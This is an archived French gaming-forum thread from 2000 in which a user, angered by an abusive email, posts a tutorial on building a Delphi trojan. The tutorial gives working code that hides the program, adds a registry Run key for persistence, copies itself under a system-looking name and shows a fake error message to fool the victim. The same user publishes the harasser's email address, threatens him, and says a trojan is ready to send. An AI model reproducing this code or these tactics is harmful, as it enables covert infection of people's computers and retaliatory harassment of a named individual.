Archives des forums MMO/MMORPG > Baldur's Gate 2 > BG2 - Forum général > Désolant, "benworld"...
DĂ©solant, "benworld"...
Par Halloween le 19/10/2000 Ă 3:09:00 (#65106)
Je veux bien laisser mon adresse email dans le profil de ce forum, mais si c'est pour y recevoir des messages dont la vulgarité n'a d'égale que leur inconsistance, ce n'est vraiment pas la peine...
Vu que ce message insultant montre qu'il a été écrit par quelqu'un qui visite (je n'ose pas dire participe à ) ce forum, je serais très reconnaissant au nommé "benworld" d'arrêter de polluer ma boite...
Je ne sais pas ce que j'ai fait Ă cet individu, mais s'il a quelque chose Ă me dire, qu'il me le dise ici...et poliment, cette fois...
Halloween, car long est le chemin...
Par ArTaNiS le 19/10/2000 Ă 3:21:00 (#65107)
Vous savier que le Virus C"H"I peut faire prendre votre pc en feu?
Voici un ti texte de mon cru pour les cons comme ca.
Programmation d'un trojan sous Delphi (1/?)
-------------------------------------------
Ben voilĂ , je vais vous proposer d'apprendre Ă programmer un trojan en
Delphi, avec des fonctions comme rebooter le pc, créer un répertoire,
renommer des fichiers, jouer la marseillaise, supprimer des fichiers, ouvrir
le lecteur de cd, ... C'est pas kewl ca non. Donc je vous préviens tout de
suite, il sera programmé en Delphi, donc procurez le vous vite (personnelement,
j'utilise la version 4 standard (mes parents me sponsorisent ;)). Et pour
commencer qu'est ce que c'est qu'un trojan, je vais vous résumer mais si vous
connnaissez vraiment pas je vous conseille l'article de CyberBobJr, paru dans
alternative le mag de Galaad.Danc un trojan, aussi appellé cheval de troie(CDT),
c'est un programme qui a la mĂŞme fonction que le cheval d'Ulysse (pas celui
avec nono le petit robot :), ou plus clairement prendre le contrĂ´le de la
place ennemie (le pc d'un couillon).
Donc un trojan est composé de deux parties, un client (le contrôle) et un
serveur (la taupe). La taupe a pour mission de lancer le prog à chaque démarage
du pc et d'ouvrir certains ports du pc cible.
Ben voilĂ , je vous ai mis l'eau Ă la bouche lĂ , non? Et comme je suis pas un
salaud, je vais pas vous faire attendre plus longtemps, attaquons!!!
Bon, avant tout, il serait bien que vous vous munissiez de certains
composants, allez sur http://www.rtfm.be/fpiette/ et téléchargez ics, c'est
grâce à ce composant TCP/IP que poura fonctionner notre trojan. Voilà , vous
l'avez installé? Bon on va d'abord commencer à s'attaquer à la taupe. Voila,
ce fichier on va l'envoyer à la victime, il faudra qu'il le télécharge, puis
qu'il le démarre et que là le fichier ouvre les ports de la bécane et
qu'ensuite, il se relance à chaque démarage. En plus il faudrat que ce
fichier soit absent de la barre des tâches et de ctrl+alt+suppr. Ben autant
dire que ça fait beaucoup tout ca. On va donc d'abord voir comment lancer le
programme espion à chaque démarage. Pour cela, il faut infecter la base des
registres, dans la partie HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
Currentversion\Run . Dans ce registre, on va lui indiquer le chemin et le
nom du programme à lancer à chaque démarage, par exemple c:\windows\system\
winsys.exe . Il faut toujours donner un nom au programme qui fasse made in
Krosoft, ainsi que le mettre dans un répertoire ou on ne va pas tout les
jours (créez pas c:\trojan\espion.exe :) Bon donc comment allons nous faire
tout cela en Delphi? He ben je sais pas... Non non partez pas, je rigole
Donc il faut utiliser winreg.pas (uses winreg.pas), comme je suis un mec
vachement kewl, je vous le fournis (merci qui?). Donc on va mettre tout ça
dans la procédure qui se lance au démarage du programme. Voir ci-dessous.
procedure TForm1.FormCreate(Sender: TObject);
var a : string; // DĂ©claration
pc: array[0..250] of char; // des
reg: TWinRegistry; // variables
begin
ShowWindow(Application.Handle, SW_HIDE); // on cache l'application dans la
barre des tâches.
GetWindowsDirectory(pc, sizeof(pc)); //pour obtenir le répertoire de
//Windows
a := strpas(pc)+'\system'; //RĂ©pertoire de Win\system
// ---------------- Infection de la base des registres -----------------
reg := TWinRegistry.CreateWithKey(HKEY_LOCAL_MACHINE, 'Software\Microsoft\Windows\Currentversion\Run');
// Création de la clé dans
// HKEY_LOCAL_MACHINE......
reg.WriteString('', 'BOOTSTART', a + 'winsys.exe 1');
// Ecriture dans la clé, ici le nom est BOOTSTART et la valeur c:\windows\system\winsys.exe 1.
reg.free;// ------------------------ Fin de l'infection ------------------------
if not fileexists(a + 'winsys.exe') then copyfile(pchar(application.exename), pchar(a+ 'winsys.exe'), false);
// On regarde si le fichier winsys.exe existe (ce qui serait etonnant), et donc si il n'existe pas on le copie dans c:\windows\system .
if paramstr(1) <> '1' then // Si le fichier trojan Ă pas de paramettre = Ă 1 alors affiche message.
MessageBoxEx(0, 'Le fichier WKsoft2d.dll est absent ou endommagé.', 'Windows Error Dlls', MB_SYSTEMMODAL, LANG_FRENCH);
// Ca c'est pour explique que rien
// ne se lance
Application.ProcessMessages; end;
Donc voilà , avec ça au démarage du programme, il y a la clé qui se créée, et
l'espion est copié dans le répertoire windows\system, sous le nom de winsys.exe . Un faux message d'erreur se lance, pour tromper le pauvre naze que vous voulez infecter. Et le programme est cacher de la barre des taches grace a ShowWindow(Application.Handle, SW_HIDE). Il n'est meme pas la peine de cacher le prog de Ctrl+Alt+Suppr puisque que qui irait se mefier de winsys.
Donc avec ça vous pouvez infecter votre victime et faire que le programme se
lance à chaque démarage.
Bon la prochaine fois on verra comment rebboter un pc, faire apparaitre un
message, créer un repertoire, renommer, executer ou supprimer un fichier, bref
quelques routines qui pourrait ĂŞtre utiles (gnarf, gnarf, gnarf).
------------------
Nous renaitron tous... un jour.
-Ulcaster
Par ArTaNiS le 19/10/2000 Ă 3:27:00 (#65108)
--------------------------------
Non, chère Artanis je ne suis pas Gai seulement impatient de pouvoir enfin joué a baldur Deuhhhhhhhh.
De plus oserai tu me traité de gai avec un pseudo pareille NON DE ZEUS ( bise bise a la moqueuhhhhh)
Je te salut bien bas et bonne continuation.
PS: MOTHERFUCKER oups!!!!!! pardon.
E-Mail: Benworld@wanadoo.fr
-----------------------------
La si il retourne sur sur son mail quand je suis online, il est fini l'enfant de chienne!
PS: J'ai toute une bande de pot qui pourrait te faire chier genre Utilisé ton téléphone pour faire des longue distance (renseigne toi sur le Beigne Boxing!)
------------------
Nous renaitron tous... un jour.
-Ulcaster
Par BornToKill le 19/10/2000 Ă 11:42:00 (#65109)
Posté par ArTaNiS:
Programmation d'un trojan sous Delphi
n'd'dieux ... té un sacré enc*** d'Hackeur tôa http://forums.jeuxonline.info/eek.gif
et avec un FireWall y passe ton prog ... de plus certain
anti-virus détecte des modifs de base de registre non ?
personnellement je n'ouvre plus (me suis fait niquer une fois ..)
les .EXE reçu dans ma BAL ...
C'Ă©tait interessant Ă connaitre quand mĂŞme (niveau programmation) ...
------------------
[ les Inconditionnels De Daniel Prévost
Par reavor le 19/10/2000 Ă 11:59:00 (#65110)
Crois tu que je sois assez con pour laisser mon e-mail, comme ca!!!
Par Halloween le 19/10/2000 Ă 12:27:00 (#65111)
Mais ce genre de blague vulgaire pour ĂŞtre vulgaire...
Réserve tes insanités aux personnes qui partagent ton humour de caniveau...
Sans rancune...
Halloween, car long est le chemin...
Par Nijel le 19/10/2000 Ă 16:50:00 (#65112)
Par ArTaNiS le 19/10/2000 Ă 18:49:00 (#65113)
Il est intégrer a un ti trojan (le mien) et prèt a être envoyer la!
Je fait quoi?
------------------
Nous renaitron tous... un jour.
-Ulcaster
Par Dutch Dixon le 20/10/2000 Ă 0:00:00 (#65114)
Par one1504 le 20/10/2000 Ă 0:05:00 (#65115)
"hein de la liqueur ou ça !!!" ;)
JOL Archives 1.0.1
@ JOL / JeuxOnLine